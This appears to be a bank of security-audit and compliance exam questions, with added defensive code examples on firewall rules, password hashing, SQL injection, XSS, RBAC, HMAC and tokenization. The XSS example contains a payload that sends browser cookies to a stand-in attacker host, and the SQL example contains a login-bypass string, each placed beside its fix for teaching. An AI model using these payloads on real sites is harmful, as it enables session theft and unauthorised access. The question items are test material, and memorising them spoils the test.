All questions (176)
Which of the following is a 'preventive' control in the context of network security?
A covered entity under HIPAA uses a cloud service to store Protected Health Information (PHI). The cloud provider experiences a data breach where unencrypted PHI is exposed. Under the HIPAA Breach Notification Rule, which of the following actions is REQUIRED?
Under the General Data Protection Regulation (GDPR), a 'Data Controller' is defined as:
A retailer processes credit card transactions. According to PCI DSS Requirement 3 (Protect stored cardholder data), which of the following data elements is permitted to be stored after authorization, provided it is encrypted?
The NIST Cybersecurity Framework (CSF) organizes its Core into five concurrent and continuous functions. Which function includes activities to 'develop and implement the appropriate safeguards to ensure delivery of critical infrastructure services'?
An organization is adopting the COBIT 2019 framework. Which of the following is NOT one of the six 'Governance System Principles' of COBIT 2019?
A penetration tester is hired to assess a company's external security. The tester sends a deceptive email to the HR department claiming to be an applicant, with a malicious attachment designed to harvest credentials. This type of attack is best classified as:
Which of the following authentication methods provides the highest level of security for remote access to a corporate network?
An auditor is reviewing the 'Least Privilege' implementation for a database. They find that the 'Reporting_User' role has 'DROP TABLE' permissions. Why is this a control deficiency?
Which of the following best describes the concept of 'Defense in Depth'?
A service organization is undergoing a SOC 2® engagement. The auditor observes that the organization uses a 'bastion host' or 'jump box' to access the production network. What is the primary security purpose of this component?
In the context of encryption, what is the primary difference between symmetric and asymmetric encryption?
A company wants to ensure that sensitive emails sent to external clients cannot be read by interceptors. They implement a solution where the sender uses the recipient's public key to encrypt the message. This ensures:
An auditor is reviewing the incident response plan of a financial institution. The plan states that in the event of a ransomware attack, the first step is to 'Pay the ransom immediately to restore operations.' How should the auditor evaluate this procedure?
Which of the following is a key requirement of the NIST Privacy Framework's 'Control' function?
Which of the following is a 'corrective' control?
An auditor is reviewing the logical access controls for a financial application. They notice that the 'Application Administrator' account is shared by three members of the IT support team. The password is stored in a password vault. What is the primary risk?
Under the CIS Controls (Center for Internet Security), Control 1 is 'Inventory and Control of Enterprise Assets'. Why is this considered the foundational control?
A company implements a 'Zero Trust' architecture. Which of the following principles is central to this model?
A company is subject to GDPR. They wish to use customer data for a new purpose (marketing) that was not disclosed when the data was originally collected. What must they typically do?
A company uses 'Tokenization' to protect credit card numbers. How does this differ from Encryption?
Which of the following is a 'physical' security control?
Which of the following is a requirement of the HIPAA Security Rule but NOT the Privacy Rule?
Which of the following best describes 'Static Application Security Testing' (SAST)?
An auditor observes that a company uses 'Symmetric' encryption for transmitting large database backups across a public network. The key exchange is handled via a separate secure channel. Is this appropriate?
In the context of COBIT 2019, what is the purpose of the 'Goals Cascade'?
A company uses a 'Biometric' authentication system. The 'False Acceptance Rate' (FAR) is set to 0.01%. What does this mean?
Which of the following is a 'Logical' access control?
Under the NIST Cybersecurity Framework, 'Recovery Planning' falls under which function?
A company stores customer passwords in a database. To protect them, they use a hashing algorithm. Which additional technique should be applied to prevent 'Rainbow Table' attacks?
Which of the following is a 'Social Engineering' technique where the attacker waits for an authorized user to pass through a secure door and then follows them inside?
A company uses a 'Public Key Infrastructure' (PKI). What is the role of the 'Certificate Authority' (CA)?
An auditor is reviewing the 'Incident Response' log. They see an entry: 'Server detected high CPU usage. Investigation showed it was a scheduled backup. Ticket closed.' Was this an 'Incident'?
Which of the following is a requirement of PCI DSS Requirement 11 (Regularly test security systems and processes)?
Which of the following is the MOST effective method to prevent 'SQL Injection' attacks in a web application?
Which of the following entities is considered a 'Covered Entity' under the HIPAA Privacy Rule?
Under GDPR, which principle requires that personal data be adequate, relevant, and limited to what is necessary in relation to the purposes for which they are processed?
An organization uses a 'defense-in-depth' strategy. Which of the following best represents this approach?
Which NIST Cybersecurity Framework (CSF) function includes the category 'Recovery Planning'?
A company processes credit card transactions. Which standard is MOST applicable to their environment?
Which type of attack involves an attacker inserting malicious code into a website's input field to manipulate the backend database?
Which of the following is a detective control?
In the context of CIS Controls, what is the primary purpose of 'Inventory and Control of Enterprise Assets' (Control 1)?
Which encryption method uses a pair of keys: a public key for encryption and a private key for decryption?
Which NIST Special Publication provides a catalog of security and privacy controls for federal information systems?
Which of the following best describes 'Tokenization'?
A healthcare provider stores patient records in a cloud database. Which HIPAA rule specifically governs the technical safeguards (like encryption and access control) for this electronic Protected Health Information (ePHI)?
A company uses a biometric scanner for server room access. This is an example of which authentication factor?
In the context of COBIT 2019, which of the following is a 'Governance Objective' rather than a 'Management Objective'?
Which of the following is a 'Corrective' control?
A company is subject to GDPR. A data breach occurs involving unencrypted personal data of 5,000 customers. Within what timeframe must the company generally notify the supervisory authority?
An auditor is reviewing the 'User Access Review' control. The policy states reviews happen quarterly. The auditor finds that for Q2, the review was signed off by the same person who has administrative rights to grant access. What is the risk?
Which phase of the Cyber Kill Chain involves transmitting the weaponized code to the target environment (e.g., via email attachment)?
Which of the following is a primary benefit of using a 'VPN' (Virtual Private Network) for remote employees?
Which NIST Privacy Framework function includes the category 'Data Processing Management'?
Which of the following is a 'Preventive' control?
Under the HIPAA Security Rule, 'Encryption' is classified as an 'Addressable' implementation specification. What does 'Addressable' mean?
Which of the following is a 'Social Engineering' attack?
Which of the following is a 'Physical' security control?
A company stores customer passwords in a database. To enhance security, they add a random string of characters to each password before hashing it. This technique is known as:
What is the primary purpose of a 'DDoS' (Distributed Denial of Service) attack?
An auditor is reviewing the 'Incident Response Plan'. Which phase should occur immediately after 'Containment'?
Which of the following is a 'Logical' access control?
Which GDPR right allows an individual to request that their personal data be sent to them or another controller in a structured, commonly used, and machine-readable format?
Which of the following is a key principle of 'Zero Trust' architecture?
Which COBIT 2019 component describes the rules, regulations, and policies that the enterprise must comply with?
An auditor is testing 'Logical Access'. They find a user with the role 'SuperAdmin'. This user is also the 'HR Manager'. What is the primary concern?
A company uses 'Ransomware' insurance. This is an example of which risk response strategy?
Which of the following is a 'Data Loss Prevention' (DLP) control?
Which of the following is a 'Symmetric' encryption algorithm?
An auditor is reviewing the 'Termination' process. They find that while network access is revoked immediately, physical access cards are often collected weeks later. What is the risk?
An auditor finds that a company's 'Incident Response Plan' has not been tested or updated in 3 years. What is the primary recommendation?
A healthcare provider stores patient records in a data warehouse. To comply with HIPAA while allowing data analysts to study demographic trends, the organization replaces patient names with unique alphanumeric codes that can be mapped back to the original data only by the database administrator. This technique is known as:
Under the General Data Protection Regulation (GDPR), a data subject requests that a company transmit their personal data directly to another service provider. This request falls under which specific right?
Which of the following NIST Cybersecurity Framework (CSF) functions is PRIMARILY associated with the implementation of safeguards to ensure delivery of critical infrastructure services, such as Access Control and Awareness Training?
A retailer processes credit card transactions. They have segmented their network so that the Cardholder Data Environment (CDE) is isolated from the corporate Wi-Fi network. According to PCI DSS, what is the primary benefit of this segmentation?
An organization uses a 'Defense in Depth' strategy. Which of the following represents a correct layering of controls from the perimeter inward?
In the context of COBIT 2019, which of the following best describes the distinction between Governance and Management?
A company implements a 'Zero Trust' architecture. Which of the following principles is central to this approach?
Which of the following is a primary responsibility of the 'Data Controller' under GDPR?
A company is subject to HIPAA. An employee loses a company laptop containing unencrypted ePHI (electronic Protected Health Information). Under the HIPAA Breach Notification Rule, what is the immediate requirement if the breach affects more than 500 individuals?
Which of the following is a characteristic of a 'Symmetric' encryption algorithm?
Which of the following is an example of a 'Preventive' control?
An auditor is reviewing a client's compliance with the NIST Privacy Framework. The client has a process to 'notify individuals about how their data is collected and used'. This aligns with which Function of the NIST Privacy Framework?
A company uses a 'Phishing Simulation' to test employees. This is primarily a test of which security domain?
Which of the following describes a 'Logic Bomb'?
Which of the following is a key requirement of the HIPAA Security Rule but NOT the Privacy Rule?
An auditor is reviewing a firewall configuration. They see a rule at the bottom of the Access Control List (ACL) that says 'DENY ALL'. What is this practice called?
An auditor is testing the 'Logical Access' controls for an ERP system. They select a sample of new employees and verify that their access rights were approved by a manager. This test is designed to validate which assertion?
An organization discovers a vulnerability in their web server software. The vendor has released a patch, but the organization cannot apply it immediately due to compatibility issues with a legacy application. What is the BEST temporary course of action?
Which of the following statements accurately describes the 'Integrity' component of the CIA Triad?
Which of the following is a 'Corrective' control?
An auditor is reviewing a database schema. They notice that the 'SocialSecurityNumber' column is stored in cleartext. Which control is missing?
A company uses a biometric fingerprint scanner and a PIN code for server room access. What type of authentication is this?
Which CIS Control is typically prioritized as Control #1 because you cannot protect what you do not know you have?
An auditor is reviewing the 'Incident Response Plan'. The plan includes a step for 'Containment'. What is the primary goal of this phase?
Which of the following attacks involves an attacker intercepting communication between two parties and relaying messages between them?
A company uses 'Asymmetric' encryption for secure email. If Alice wants to send a confidential email to Bob that only Bob can read, which key does she use to encrypt it?
Which of the following is a 'Detective' control?
Under COBIT 2019, which component of the governance system describes the 'rules of the game'?
A company wants to implement a 'Least Privilege' model for its cloud storage buckets. What does this entail?
A company is designing a new data center. They install a 'Biometric Mantrap' at the entrance. What is the purpose of this control?
A company is implementing a 'Data Loss Prevention' (DLP) solution. Which of the following is a primary function of DLP?
Which of the following is a characteristic of 'Ransomware'?
A company uses a 'VPN' (Virtual Private Network) for remote employees. What is the primary security function of the VPN?
An auditor is testing the 'Termination' process. They find that a terminated employee's Active Directory account was disabled 5 days after their departure. The policy states 'Immediate' (within 24 hours). What is the risk?
Which of the following is a requirement of the 'NIST SP 800-53' framework?
A company uses 'Input Validation' on its web forms. Which attack does this primarily prevent?
What is the difference between 'Authentication' and 'Authorization'?
Which of the following is a 'Social Engineering' technique?
A company uses 'Role-Based Access Control' (RBAC). How are permissions assigned?
A company uses 'Hashing' to store passwords. Why is this better than encryption?
A healthcare provider stores patient records in a cloud database. To comply with HIPAA, they must ensure that even if the database storage media is stolen, the data remains unreadable. Which control is MOST appropriate to address this specific risk?
Under the General Data Protection Regulation (GDPR), a data subject requests that a company delete all their personal data. The company refuses because the data is required to be retained by tax laws. Which GDPR principle allows the company to refuse this request?
An auditor is evaluating a company's compliance with PCI DSS Requirement 3 (Protect stored cardholder data). The auditor finds that the Primary Account Number (PAN) is displayed in full on the customer service representative's screen. Which specific control is missing?
Which component of the NIST Cybersecurity Framework (CSF) focuses on developing and implementing the appropriate activities to maintain plans for resilience and to restore any capabilities or services that were impaired due to a cybersecurity event?
An attacker sends an email to the HR department with an attachment named 'Payroll_Update.exe' whose icon has been made to look like a PDF document. When clicked, it installs software that logs keystrokes. Which stage of the cyber-attack lifecycle does the 'clicking of the attachment' represent?
A company implements a 'Zero Trust' architecture. Which of the following principles is central to this approach?
Which of the following is a key principle of the COBIT 2019 governance framework?
A company is subject to HIPAA. An employee loses a company laptop containing unencrypted ePHI (electronic Protected Health Information) of 600 patients. Under the HIPAA Breach Notification Rule, which of the following actions is REQUIRED?
Which of the following best describes the 'Integrity' component of the CIA Triad in information security?
Which of the following authentication methods is considered 'Something you are'?
Which CIS Control focuses on 'Inventory and Control of Enterprise Assets'?
In the context of NIST SP 800-53, what does the term 'Control Baseline' refer to?
An auditor is testing a client's firewall configuration. They notice a rule that allows 'Any' source IP to access the database port (1433) directly from the internet. Which security principle is violated?
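The firewall questions above (the trailing 'DENY ALL' rule and the rule that exposes port 1433 to any source) are easiest to reason about with a first-match evaluator. The block below is an added illustration, not part of the question bank: it evaluates an ordered ACL top to bottom the way most firewalls do, falls back to an implicit deny when nothing matches, and flags allow rules reachable from any source. The addresses, subnets and rule sets are constructed for the demonstration.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Rule:
    action: str          # "allow" or "deny"
    src: str             # CIDR, single address, or "any"
    dst: str             # CIDR, single address, or "any"
    port: Optional[int]  # None matches every destination port
    comment: str = ""


def _matches_net(spec: str, ip: str) -> bool:
    if spec == "any":
        return True
    return ipaddress.ip_address(ip) in ipaddress.ip_network(spec, strict=False)


def evaluate(acl: List[Rule], src_ip: str, dst_ip: str, port: int) -> Tuple[str, Optional[Rule]]:
    """First-match evaluation, top to bottom. Returns (action, matching rule).

    If no rule matches, the result is an implicit deny (rule None). An explicit
    'deny any any' at the bottom makes that default visible in the config and
    lets the firewall log what it drops.
    """
    for rule in acl:
        if (_matches_net(rule.src, src_ip) and _matches_net(rule.dst, dst_ip)
                and (rule.port is None or rule.port == port)):
            return rule.action, rule
    return "deny", None


def overly_permissive(acl: List[Rule]) -> List[Rule]:
    """Audit helper: allow rules that accept traffic from any source."""
    return [r for r in acl if r.action == "allow" and r.src == "any"]


# Constructed environment: a SQL Server on the database subnet and an app tier.
DB_SERVER = "10.0.5.10/32"
APP_SUBNET = "10.0.1.0/24"
MSSQL = 1433

WEAK_ACL = [
    Rule("allow", "any", DB_SERVER, MSSQL, "finding: database port reachable from the internet"),
    Rule("deny", "any", "any", None, "explicit deny-all cleanup rule"),
]

HARDENED_ACL = [
    Rule("allow", APP_SUBNET, DB_SERVER, MSSQL, "only the application tier may reach the database"),
    Rule("deny", "any", "any", None, "explicit deny-all cleanup rule"),
]

if __name__ == "__main__":
    internet_host = "203.0.113.7"   # documentation range, stands in for an arbitrary attacker
    for name, acl in (("weak", WEAK_ACL), ("hardened", HARDENED_ACL)):
        action, rule = evaluate(acl, internet_host, "10.0.5.10", MSSQL)
        print(f"{name}: internet -> db:1433 = {action} ({rule.comment if rule else 'implicit deny'})")
    print("flagged:", [r.comment for r in overly_permissive(WEAK_ACL)])
```

The deny-all rule at the bottom does not make the weak ACL safe, because evaluation stops at the first match; the fix is to remove or narrow the offending allow rule above it, which is exactly what the audit helper surfaces.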
Which of the following scenarios describes a 'Phishing' attack?
What is the primary purpose of a 'VPN' (Virtual Private Network) for remote employees?
A company wants to ensure that their cloud provider cannot access their sensitive data, even if the provider is subpoenaed. Which control achieves this?
An auditor is reviewing the 'Incident Response Plan'. Which phase of incident response involves removing the threat from the environment (e.g., deleting malware, disabling breached accounts)?
Which of the following is an example of a 'Detective' control?
A company processes credit card payments. Which standard MUST they comply with?
A company uses 'Asymmetric Encryption' for secure email. If User A wants to send a confidential message to User B, which key should User A use to encrypt the message?
An auditor observes that a company uses 'Hashing' to store passwords. Why is hashing preferred over encryption for password storage?
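Several questions above turn on the same three points: why passwords are hashed rather than encrypted, what a per-user salt adds against rainbow tables, and why the hash should be slow. The block below is an added example written for this page, not code from the question bank. It uses only the Python standard library (PBKDF2-HMAC-SHA256 via hashlib); the usernames and passwords are constructed, and two users deliberately share a password so the effect of salting is visible.

```python
import hashlib
import hmac
import os
from typing import Callable, Dict, Optional

# Constructed sample credentials; alice and bob chose the same password.
SAMPLE_USERS: Dict[str, str] = {
    "alice": "Summer2024!",
    "bob": "Summer2024!",
    "carol": "correct horse battery staple",
}

# Work factor for PBKDF2-HMAC-SHA256. A deliberately slow hash is what makes
# offline guessing expensive; bare SHA-256 runs billions of times per second on a GPU.
PBKDF2_ITERATIONS = 600_000


def unsalted_sha256(password: str) -> str:
    """The weak scheme: a bare, unsalted hash.

    Identical passwords give identical digests, so one precomputed rainbow
    table (or one cracked digest) exposes every user who chose that password.
    """
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = PBKDF2_ITERATIONS) -> str:
    """Salted, slow hash stored in a self-describing record:

        pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>

    The salt is random per user and stored in the clear beside the digest; its
    job is uniqueness, not secrecy. Because the function is one-way there is no
    decryption key for an attacker to steal, which is why hashing rather than
    encryption is the right primitive for password storage.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    scheme, iterations, salt_hex, digest_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        raise ValueError(f"unsupported password scheme: {scheme}")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    # compare_digest avoids leaking, through timing, how many bytes matched.
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def digests_collide(users: Dict[str, str], hash_fn: Callable[[str], str]) -> bool:
    """True if two users end up with the same stored value under hash_fn."""
    stored = [hash_fn(pw) for pw in users.values()]
    return len(set(stored)) < len(stored)


if __name__ == "__main__":
    print("unsalted collisions:", digests_collide(SAMPLE_USERS, unsalted_sha256))
    print("salted collisions:  ", digests_collide(SAMPLE_USERS, hash_password))
    record = hash_password("Summer2024!")
    print(record)
    print("correct password verifies:", verify_password("Summer2024!", record))
    print("wrong password verifies:  ", verify_password("summer2024!", record))
```

The record format carries its own iteration count, so the work factor can be raised later and old records re-hashed on the user's next successful login without a migration.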
Which of the following is a 'Physical' threat to information systems?
A company implements 'Data Loss Prevention' (DLP) software. Which of the following actions would the DLP system most likely block?
Which of the following is a 'Nation-State' threat actor most likely to target?
Under GDPR, which role determines the 'purposes and means' of processing personal data?
A company uses 'Tokenization' for credit card numbers. What is the primary benefit of tokenization over encryption for the merchant?
Which NIST framework is specifically designed to help organizations manage privacy risks?
A company uses 'Symmetric Encryption'. Which of the following is a major challenge associated with this method?
An auditor is reviewing the 'Incident Response' logs. They see a 'False Positive'. What does this mean?
Which of the following is a 'Preventive' control for 'SQL Injection'?
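The SQL injection questions above (the attack itself, input validation, and the most effective preventive control) are best seen side by side in code. The block below is an added example, not part of the question bank: the same login check written with string concatenation and with a parameterized query, plus an allow-list validator as a second layer. It runs against an in-memory SQLite database; the table contents, the stored credential value and the attacker's input are all constructed.

```python
import re
import sqlite3

# Constructed placeholder for a stored credential hash (never the password itself).
ADMIN_HASH = "constructed-hash-value-for-demo"

# Constructed attacker input: closes the string literal, then comments out the
# rest of the WHERE clause so the password check is never evaluated.
PAYLOAD = "admin' --"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", ADMIN_HASH))
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str) -> bool:
    """Builds the statement by concatenation: user input becomes SQL text."""
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password_hash = '{password_hash}'"
    )
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password_hash: str) -> bool:
    """Parameterized query: the driver passes input as data, so quotes and
    comment markers inside it can never change the statement's structure."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, password_hash),
    ).fetchone()
    return row is not None


# Allow-list validation as defence in depth in front of the query. It is not a
# substitute for parameterization: fields that legitimately contain quotes
# (names, free text) cannot be protected this way.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def valid_username(username: str) -> bool:
    return USERNAME_RE.fullmatch(username) is not None


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, payload:    ", login_vulnerable(conn, PAYLOAD, "wrong"))
    print("parameterized, payload: ", login_parameterized(conn, PAYLOAD, "wrong"))
    print("parameterized, legit:   ", login_parameterized(conn, "admin", ADMIN_HASH))
    print("payload passes allow-list:", valid_username(PAYLOAD))
```

In the vulnerable version the executed statement ends up as `... WHERE username = 'admin' --' AND password_hash = 'wrong'`, so the attacker is logged in as admin with any password. In the parameterized version the same input is simply looked up as the literal username `admin' --`, which does not exist.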
Which of the following is an example of 'Social Engineering'?
An auditor is reviewing the 'Data Retention Policy'. The policy states that customer data is deleted after 7 years. However, the auditor finds backups containing 10-year-old data. This is a violation of which GDPR principle?
Under the HIPAA Security Rule, which of the following is a 'Covered Entity'?
A European customer requests that a US-based company delete all their personal data. Under GDPR, this is known as:
Which PCI DSS requirement falls under the goal of 'Protect Cardholder Data'?
The NIST Cybersecurity Framework (CSF) is organized into five core functions. Which function involves developing and implementing the appropriate activities to maintain plans for resilience and to restore any capabilities or services that were impaired due to a cybersecurity event?
Which component of COBIT 2019 describes the 'Governance System'?
According to the CIS Controls v8, what is Control 1 (the most foundational control)?
NIST Special Publication 800-53 is primarily designed for:
Which part of the NIST Privacy Framework helps organizations determine their current privacy posture and their target state?
An employee receives an email appearing to be from the CEO asking for an urgent wire transfer. The email address is slightly misspelled. This is an example of:
A web application allows users to input text into a comment field. A malicious user enters a script that executes in the browsers of other users viewing the comment. This is known as:
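For the stored cross-site scripting scenario above, the defence is output encoding chosen for the context the data lands in. The block below is an added example, not part of the question bank: a comment template rendered once with raw interpolation and once with HTML escaping, exercised with a script payload for the element body and an attribute-breakout payload for the `title` attribute. The payloads and the heuristic checker are constructed for the demonstration.

```python
import html

# Constructed attacker inputs.
SCRIPT_PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
ATTRIBUTE_PAYLOAD = '" onmouseover="alert(document.cookie)'


def render_comment_vulnerable(comment: str) -> str:
    """Raw interpolation. Markup in the comment becomes part of the page and
    executes in the browser of every user who views it (stored XSS)."""
    return f'<div class="comment" title="{comment}">{comment}</div>'


def render_comment_safe(comment: str) -> str:
    """Output encoding: escape &, <, >, " and ' so the browser treats the comment
    as text both inside the element and inside the quoted attribute."""
    escaped = html.escape(comment, quote=True)
    return f'<div class="comment" title="{escaped}">{escaped}</div>'


def breaks_out_of_context(rendered: str) -> bool:
    """Demo-only heuristic: did the input introduce a tag or an event handler
    that the template itself did not contain?"""
    lowered = rendered.lower()
    return "<script" in lowered or 'onmouseover="' in lowered


if __name__ == "__main__":
    for payload in (SCRIPT_PAYLOAD, ATTRIBUTE_PAYLOAD):
        print("vulnerable:", render_comment_vulnerable(payload))
        print("safe:      ", render_comment_safe(payload))
        print()
```

Escaping is the primary control here; a Content-Security-Policy that disallows inline scripts is a useful second layer but does not replace it.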
Which stage of the 'Cyber Kill Chain' involves the attacker installing a backdoor or remote access trojan (RAT) to maintain access?
What is the primary purpose of a Distributed Denial of Service (DDoS) attack?
Which of the following is a characteristic of an 'Advanced Persistent Threat' (APT)?
An organization implements a 'Zero Trust' architecture. Which principle is central to this approach?
Which authentication factor is represented by a fingerprint scan?
A network administrator separates the Finance department's network traffic from the Engineering department's traffic using VLANs. This is an example of:
Which security device is primarily designed to detect and block malicious traffic patterns or signatures in real-time?
In an Identity and Access Management (IAM) system, 'Role-Based Access Control' (RBAC) assigns permissions based on:
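The RBAC questions above, and the earlier audit finding of a 'Reporting_User' role holding 'DROP TABLE', describe permissions that attach to roles rather than to individual users. The block below is an added example, not part of the question bank. SQLite has no GRANT statement, so it uses the sqlite3 module's authorizer hook to enforce a role's permitted operations at statement-prepare time; the roles, users, table and statements are constructed.

```python
import sqlite3
from typing import Dict, Optional, Set

# Permissions attach to roles, expressed as sqlite3 authorizer action codes.
# None means unrestricted (DDL such as DROP TABLE included).
ROLE_PERMISSIONS: Dict[str, Optional[Set[int]]] = {
    "Reporting_User": {sqlite3.SQLITE_SELECT, sqlite3.SQLITE_READ, sqlite3.SQLITE_FUNCTION},
    "App_Writer": {sqlite3.SQLITE_SELECT, sqlite3.SQLITE_READ, sqlite3.SQLITE_FUNCTION,
                   sqlite3.SQLITE_INSERT, sqlite3.SQLITE_UPDATE, sqlite3.SQLITE_DELETE},
    "DBA": None,
}

# Users receive roles, never permissions directly.
USER_ROLES: Dict[str, str] = {
    "report_svc": "Reporting_User",
    "orders_api": "App_Writer",
    "dba_jane": "DBA",
}


def open_as(user: str) -> sqlite3.Connection:
    """Open a connection whose allowed operations are those of the user's role."""
    conn = sqlite3.connect(":memory:", isolation_level=None)
    conn.execute("CREATE TABLE orders (id INTEGER PRIMARY KEY, total REAL)")
    conn.execute("INSERT INTO orders VALUES (1, 19.99)")
    allowed = ROLE_PERMISSIONS[USER_ROLES[user]]

    def authorizer(action, arg1, arg2, db_name, trigger_or_view):
        # Called by SQLite for every operation while a statement is prepared.
        if allowed is None or action in allowed:
            return sqlite3.SQLITE_OK
        return sqlite3.SQLITE_DENY

    conn.set_authorizer(authorizer)
    return conn


def attempt(user: str, sql: str) -> str:
    """Run sql as user and report 'ok' or 'denied'."""
    conn = open_as(user)
    try:
        conn.execute(sql).fetchall()
        return "ok"
    except sqlite3.DatabaseError as exc:
        if "not authorized" in str(exc):
            return "denied"
        raise
    finally:
        conn.close()


if __name__ == "__main__":
    checks = [
        ("report_svc", "SELECT count(*) FROM orders"),
        ("report_svc", "DROP TABLE orders"),   # the audit finding, now blocked
        ("orders_api", "UPDATE orders SET total = 0"),
        ("orders_api", "DROP TABLE orders"),
        ("dba_jane", "DROP TABLE orders"),
    ]
    for user, sql in checks:
        print(f"{user:11} {sql:35} -> {attempt(user, sql)}")
```

The reporting role can read and aggregate but cannot change or drop anything, which is the least-privilege state the auditor expected to find; granting the role DROP TABLE would mean a compromised reporting credential could destroy data.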
Which cryptographic concept ensures that a message has not been altered in transit?
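For the integrity question above, and the earlier one about an attacker relaying messages between two parties, it helps to see why a plain hash is not enough. The block below is an added example, not part of the question bank: an unkeyed SHA-256 check that a man-in-the-middle can defeat by recomputing the digest, beside an HMAC-SHA256 tag that cannot be forged without the shared key. The message, envelope format and attacker are constructed.

```python
import hashlib
import hmac
import json
import secrets


def sha256_hex(message: bytes) -> str:
    return hashlib.sha256(message).hexdigest()


def unkeyed_check(message: bytes, digest_hex: str) -> bool:
    """Detects accidental corruption only. Anyone who can alter the message
    in transit can recompute and replace the digest too."""
    return hmac.compare_digest(sha256_hex(message), digest_hex)


def sign(message: bytes, key: bytes) -> str:
    """HMAC-SHA256 tag over the message. Producing a valid tag requires the key."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def verify(message: bytes, key: bytes, tag_hex: str) -> bool:
    return hmac.compare_digest(sign(message, key), tag_hex)


def package(message: bytes, key: bytes) -> str:
    """Sender: message and tag travel together in a (constructed) JSON envelope."""
    return json.dumps({"msg": message.decode("utf-8"), "tag": sign(message, key)})


def unpack(envelope: str, key: bytes) -> bytes:
    """Receiver: reject anything whose tag does not verify under the shared key."""
    data = json.loads(envelope)
    msg = data["msg"].encode("utf-8")
    if not verify(msg, key, data["tag"]):
        raise ValueError("integrity check failed: message altered or tag forged")
    return msg


def tamper(envelope: str, new_message: bytes, attacker_key: bytes = b"") -> str:
    """Man-in-the-middle: rewrites the message and attaches a tag computed with
    whatever key the attacker has (here: none, so an empty key)."""
    data = json.loads(envelope)
    data["msg"] = new_message.decode("utf-8")
    data["tag"] = sign(new_message, attacker_key)
    return json.dumps(data)


if __name__ == "__main__":
    key = secrets.token_bytes(32)            # shared out of band by the two parties
    original = b"transfer 100 to account 42"
    env = package(original, key)
    print("receiver accepts original:", unpack(env, key) == original)
    forged = tamper(env, b"transfer 100000 to account 99")
    try:
        unpack(forged, key)
    except ValueError as exc:
        print("receiver rejects forgery:", exc)
    # The same attack against an unkeyed digest goes unnoticed.
    altered = b"transfer 100000 to account 99"
    print("unkeyed check fooled:", unkeyed_check(altered, sha256_hex(altered)))
```

HMAC gives integrity and origin authentication between two parties who share a key; where the receiver must also be able to prove to a third party who sent the message, a digital signature over the hash is used instead.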
An auditor is reviewing the results of a penetration test. The report identifies a 'Critical' vulnerability involving an unpatched server exposed to the internet. What is the auditor's most appropriate next step?
What is the primary difference between Vulnerability Scanning and Penetration Testing?
During a security walkthrough, an auditor notices that employees are writing passwords on sticky notes attached to their monitors. Which control is failing?
Which type of security test involves the tester having full knowledge of the system (network diagrams, source code, IP addresses) beforehand?
A company replaces sensitive credit card numbers in their database with a random string of characters that has no mathematical relationship to the original number. The mapping is stored in a secure vault. This technique is called:
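Tokenization and pseudonymization come up several times above: a random surrogate with no mathematical relationship to the original, a mapping held only in a vault or by the administrator, and PAN masking on screens. The block below is an added example, not part of the question bank, that puts those pieces together in one small vault using the Python standard library. The PAN is the standard Visa test number, the patient name is made up, and the choice to make card tokens deliberately Luhn-invalid is a common design practice, not something the questions require.

```python
import secrets
import string
from typing import Dict

DIGITS = string.digits


def luhn_valid(number: str) -> bool:
    """Luhn check-digit validation, as used by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(number)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


class TokenVault:
    """Replaces a sensitive value with a random surrogate.

    Unlike encryption there is no key and no function that maps token back to
    value; only the table inside the vault does. A downstream system that holds
    tokens therefore holds nothing an attacker can reverse, which is what takes
    it out of PCI DSS scope. The same mechanism pseudonymizes patient names: the
    code is meaningless without the mapping held by the administrator.
    """

    def __init__(self) -> None:
        self._value_by_token: Dict[str, str] = {}
        self._token_by_value: Dict[str, str] = {}

    def tokenize(self, value: str) -> str:
        if value in self._token_by_value:       # stable: same input, same token
            return self._token_by_value[value]
        while True:
            token = self._random_token(value)
            if token not in self._value_by_token and token != value:
                break
        self._value_by_token[token] = value
        self._token_by_value[value] = token
        return token

    @staticmethod
    def _random_token(value: str) -> str:
        if value.isdigit() and len(value) >= 13:
            # Format-preserving card token: random digits with the last four kept
            # so staff can confirm a card, and deliberately Luhn-invalid so the
            # token can never pass as, or be charged as, a real PAN.
            while True:
                body = "".join(secrets.choice(DIGITS) for _ in range(len(value) - 4))
                token = body + value[-4:]
                if not luhn_valid(token):
                    return token
        return secrets.token_hex(8)             # opaque pseudonym for non-card data

    def detokenize(self, token: str, caller_role: str) -> str:
        """Only the vault administrator role may reverse the mapping."""
        if caller_role != "vault_admin":
            raise PermissionError(f"role {caller_role!r} may not detokenize")
        return self._value_by_token[token]


def mask_pan(pan: str) -> str:
    """Display masking: at most the first six and last four digits shown."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


if __name__ == "__main__":
    vault = TokenVault()
    pan = "4111111111111111"                    # standard test PAN
    token = vault.tokenize(pan)
    print("PAN   :", pan, "| Luhn valid:", luhn_valid(pan))
    print("token :", token, "| Luhn valid:", luhn_valid(token))
    print("masked:", mask_pan(pan))
    print("patient code:", vault.tokenize("Jane Doe"))
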